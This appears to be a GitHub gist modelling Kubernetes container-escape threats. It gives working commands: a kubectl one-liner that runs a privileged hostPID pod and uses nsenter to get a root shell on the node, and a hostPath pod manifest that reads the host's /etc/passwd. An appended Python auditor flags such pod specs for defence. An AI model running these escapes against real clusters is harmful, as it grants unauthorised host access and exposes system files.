@ukitazume
Last active January 26, 2021 11:27
Privileged container threat model

Privileged container

A privileged container is a container that has all the capabilities of the host machine, which lifts all the limitations regular containers have. Practically, this means that privileged containers can do almost every action that can be performed directly on the host. Attackers who gain access to a privileged container, or have permissions to create a new privileged container (by using the compromised pod’s service account, for example), can get access to the host’s resources.

cf. the attack matrix for Kubernetes by Microsoft

Steps:

  1. Run the command below against the target cluster ($1 expands to the name of the node the pod is pinned to)
  kubectl run scary --restart=Never -t -i \
     --image overridden --overrides \
    '{
      "spec":{
        "hostPID": true,
        "nodeName": "'$1'",
        "containers":[{
          "name":"busybox",
          "image":"alpine",
          "command":[
            "nsenter",
            "--mount=/proc/1/ns/mnt",
            "--","/bin/bash"],
          "stdin": true,
          "tty":true,
          "securityContext":{
            "privileged":true
          }
        }]
      }
    }' --rm --attach
  2. In the resulting shell, list directories and processes; what you see belongs to the host.

hostPath

hostPath mount can be used by attackers to get access to the underlying host and thus break from the container to the host. (See “3: Writable hostPath mount” for details).

cf. the attack matrix for Kubernetes by Microsoft

Steps:

  1. Create a pod with a hostPath mount (saved as host-path-pod.yaml)
apiVersion: v1
kind: Pod
metadata:
  name: test-pd
spec:
  containers:
  - image: gcr.io/google-samples/hello-app:1.0
    name: test-container
    volumeMounts:
    - mountPath: /test-proc
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /etc
      type: Directory

$ kubectl apply -f host-path-pod.yaml

  2. Read the host's passwd file through the pod
$ kubectl exec -it test-pd -- cat /test-proc/passwd
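
To catch both patterns above before or after admission, a pod spec can be audited for the fields that made them work: `privileged`, the host namespace flags, and `hostPath` volumes. The checker below is an added example, not part of the original gist; `audit_pod` is a hypothetical helper name, and the two sample pods are constructed by reducing this page's manifests to JSON.

```python
import json

# Constructed samples: the two pod specs from this page, reduced to JSON.
SCARY = json.loads("""{"metadata": {"name": "scary"}, "spec": {"hostPID": true,
  "containers": [{"name": "busybox", "image": "alpine",
                  "securityContext": {"privileged": true}}]}}""")
TEST_PD = json.loads("""{"metadata": {"name": "test-pd"}, "spec": {
  "containers": [{"name": "test-container", "volumeMounts": [
      {"mountPath": "/test-proc", "name": "test-volume"}]}],
  "volumes": [{"name": "test-volume",
               "hostPath": {"path": "/etc", "type": "Directory"}}]}}""")

HOST_NAMESPACES = ("hostPID", "hostNetwork", "hostIPC")
CONTAINER_KINDS = ("containers", "initContainers", "ephemeralContainers")


def audit_pod(pod):
    """Return a sorted list of host-escape findings for one pod object."""
    spec = pod.get("spec") or {}
    findings = [f"{flag}=true" for flag in HOST_NAMESPACES
                if spec.get(flag) is True]
    # Map volume name -> host path for every hostPath volume in the pod.
    host_vols = {v["name"]: v["hostPath"].get("path", "")
                 for v in spec.get("volumes") or [] if v.get("hostPath")}
    mounted = set()
    for c in (c for k in CONTAINER_KINDS for c in spec.get(k) or []):
        if (c.get("securityContext") or {}).get("privileged") is True:
            findings.append(f"container {c['name']}: privileged")
        for m in c.get("volumeMounts") or []:
            if m["name"] in host_vols:
                mounted.add(m["name"])
                mode = "ro" if m.get("readOnly") else "rw"
                findings.append(f"container {c['name']}: hostPath "
                                f"{host_vols[m['name']]} at "
                                f"{m['mountPath']} ({mode})")
    # A declared but unmounted hostPath volume is still worth reporting.
    findings += [f"unmounted hostPath volume {n} ({p})"
                 for n, p in host_vols.items() if n not in mounted]
    return sorted(findings)


if __name__ == "__main__":
    for pod in (SCARY, TEST_PD):
        print(pod["metadata"]["name"], audit_pod(pod))
```

On a live cluster the same function can be fed each item of `kubectl get pods -A -o json`; the Baseline Pod Security Standard rejects all three field groups at admission time.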